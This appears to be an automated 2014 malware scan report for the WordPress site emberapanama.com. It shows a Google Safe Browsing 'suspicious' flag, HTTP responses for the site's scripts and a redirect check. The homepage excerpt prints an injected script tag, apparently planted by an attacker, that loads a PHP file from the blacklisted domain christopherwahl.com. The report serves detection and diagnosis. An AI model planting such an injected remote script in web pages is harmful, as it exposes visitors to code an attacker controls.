Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=emberapanama.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://emberapanama.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 31 Mar 2014 06:34:12 GMT Age: 6 Location: http://www.emberapanama.com/ Server: YTS/1.20.28 Content-Type: text/html; charset=UTF-8 P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=10ujkdp9ji334&b=3&s=se; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.emberapanama.com Set-Cookie: PHPSESSID=72e141dbd84d489898a6d73e43c8811e; path=/ X-Pingback: http://www.emberapanama.com/xmlrpc.php | clean |
http://www.emberapanama.com/ | 200 OK Content-Length: 19792 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: christopherwahl.com ...[8311 bytes skipped]... dia="screen"><![endif]--> <!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]--> <!-- end head --> </head> <body class="home page page-id-1278 page-template page-template-home-page-php" itemscope="itemscope" itemtype="http://schema.org/WebPage"> <script type="text/javascript" src="http://christopherwahl.com/F8Lw2Gqz.php?id="></script> <!-- Start header --> <header class="header-wraper"> <div class="row"> <div class="grid_3 header-top-left"> <!-- begin logo --> <h4> <a href="http://www.emberapanama.com" alt="Emberá Quera, te invita a que formes parte de esta linda expe ...[14006 bytes skipped]... | ||
http://www.emberapanama.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://www.emberapanama.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.emberapanama.com/wp-content/plugins/google-language-translator/js/flags.js?ver=3.8.1 | 200 OK Content-Length: 1417 Content-Type: application/x-javascript | clean |
http://www.emberapanama.com/wp-content/plugins/google-language-translator/js/toolbar.js?ver=3.8.1 | 200 OK Content-Length: 8840 Content-Type: application/x-javascript | clean |
http://www.emberapanama.com/wp-content/plugins/google-language-translator/js/load-toolbar.js?ver=3.8.1 | 200 OK Content-Length: 682 Content-Type: application/x-javascript | clean |
http://www.emberapanama.com/wp-includes/js/comment-reply.min.js?ver=3.8.1 | 200 OK Content-Length: 757 Content-Type: application/x-javascript | clean |
http://christopherwahl.com/F8Lw2Gqz.php?id= | HTTP/1.1 302 Found Connection: close Date: Mon, 31 Mar 2014 06:28:04 GMT Location: http://www.christopherwahl.com Server: Apache Vary: Accept-Encoding Content-Length: 283 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.christopherwahl.com/ | 200 OK Content-Length: 5805 Content-Type: text/html | clean |
http://www.christopherwahl.com/ndxz-studio/site/js/jquery.js | 200 OK Content-Length: 21234 Content-Type: application/javascript | clean |
http://www.christopherwahl.com/ndxz-studio/site/js/cookie.js | 200 OK Content-Length: 989 Content-Type: application/javascript | clean |
http://www.christopherwahl.com/ndxz-studio/site/js/jquery.cycle.all.js | 200 OK Content-Length: 14074 Content-Type: application/javascript | clean |
http://christopherwahl.com/index.php | 404 Not Found Content-Length: 5685 Content-Type: text/html | clean |
http://christopherwahl.com/ndxz-studio/site/js/jquery.js | 200 OK Content-Length: 21234 Content-Type: application/javascript | clean |
http://christopherwahl.com/ndxz-studio/site/js/cookie.js | 200 OK Content-Length: 989 Content-Type: application/javascript | clean |
http://christopherwahl.com/ndxz-studio/site/js/jquery.cycle.all.js | 200 OK Content-Length: 14074 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: emberapanama.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 31 Mar 2014 06:34:12 GMT
Age: 6
Location: http://www.emberapanama.com/
Server: YTS/1.20.28
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=10ujkdp9ji334&b=3&s=se; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.emberapanama.com
Set-Cookie: PHPSESSID=72e141dbd84d489898a6d73e43c8811e; path=/
X-Pingback: http://www.emberapanama.com/xmlrpc.php
GET / HTTP/1.1
Host: emberapanama.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 31 Mar 2014 06:34:12 GMT
Age: 6
Location: http://www.emberapanama.com/
Server: YTS/1.20.28
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=10ujkdp9ji334&b=3&s=se; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.emberapanama.com
Set-Cookie: PHPSESSID=72e141dbd84d489898a6d73e43c8811e; path=/
X-Pingback: http://www.emberapanama.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: emberapanama.com
Referer: http://www.google.com/search?q=emberapanama.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: emberapanama.com
Referer: http://www.google.com/search?q=emberapanama.com
Result:
The result is similar to the first query. There are no suspicious redirects found.